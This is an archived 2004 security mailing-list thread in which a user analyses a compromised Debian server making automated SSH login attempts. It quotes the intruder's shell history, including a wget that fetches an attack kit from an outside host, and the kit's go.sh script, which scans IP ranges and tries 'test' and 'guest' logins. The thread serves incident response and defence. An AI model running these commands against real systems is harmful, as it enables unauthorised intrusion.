[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.GSO.4.43.0407291600140.22268-100000@tundra.winternet.com>
From: dufresne at winternet.com (Ron DuFresne)
Subject: Re: Automated SSH login attempts?
This all looks very similair to the couple year old ssh1 hack, I recall
some of these same files and binaries I think from that old hack, but,
this looks like someone took an old hack and tried to rework it as a brute
forcer for poorly setup systems.
Thanks,
Ron DuFresne
On Thu, 29 Jul 2004, Andrei Galca-Vasiliu wrote:
> By the way, you have to be root to use "ss":
>
> sweet@...rei:~/ssh$ ./go.sh 82.77.45
> scanning network 82.77.*.*
> usec: 30000, burst packets 50
> using inteface eth0
> ERROR: UID != 0
>
>
> Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek
> povestea:
> > Hmmm - I have also been getting those login attemps, but thought them to
> > be harmless. Maybe they are not *that* harmless, though... Today I
> > managed to get my hands on a machine that was originating such login
> > attempts. I must admit I am far from being a linux security expert, but
> > this is what I've found out up to now:
> >
> > Whoever broke into the machine did not take any attempts to cover up his
> > tracks - this is what I found in /root/.bash_history:
> >
> > ------
> > id
> > uname -a
> > w
> > id
> > ls
> > wgte frauder.us/linux/ssh.tgz
> > wget frauder.us/linux/ssh.tgz
> > tar xzvf ssh.tgz
> > tar xvf ssh.tgz
> > ls
> > cd ssh
> > ls
> > ./go.sh 195.178
> > ls
> > pico uniq.txt
> > vi uniq.txt
> > ls
> > rm -rf uniq.txt
> > ./go.sh 167.205
> > ls
> > rm -rf uniq.txt vuln.txt
> > ./go.sh 202.148.20
> > ./go.sh 212.92
> > ./go.sh 195.197
> > ./go.sh 147.32
> > ./go.sh 213.168
> > ./go.sh 134.176
> > ./go.sh 195.83
> > ------
> >
> > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> > binaries:
> >
> > go.sh:
> > -------
> > ./ss 22 -b $1 -i eth0 -s 6
> > cat bios.txt |sort | uniq > uniq.txt
> > ./sshf
> > -------
> >
> > * 'ss' apparently is some sort of portscanner
> > * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> > 'test' first, then as user 'guest' (according to tcpdump).
> >
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
> >
> > The compromised machine was running an old debian woody installation
> > which had not been upgraded for at least one year, the sshd version
> > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
> >
> > As already mentioned, I am far from being an expert, but if I can assist
> > in further testing, then let me know. Please CC me, I am not subscribed
> > to the list.
> >
> > cheers,
> > Stefan
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
>
> Andrei Galca-Vasiliu
> Folio Q Advertising
> www.fq.ro
>
>
> Security is an illusion...
>
> *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
Powered by blists - more mailing lists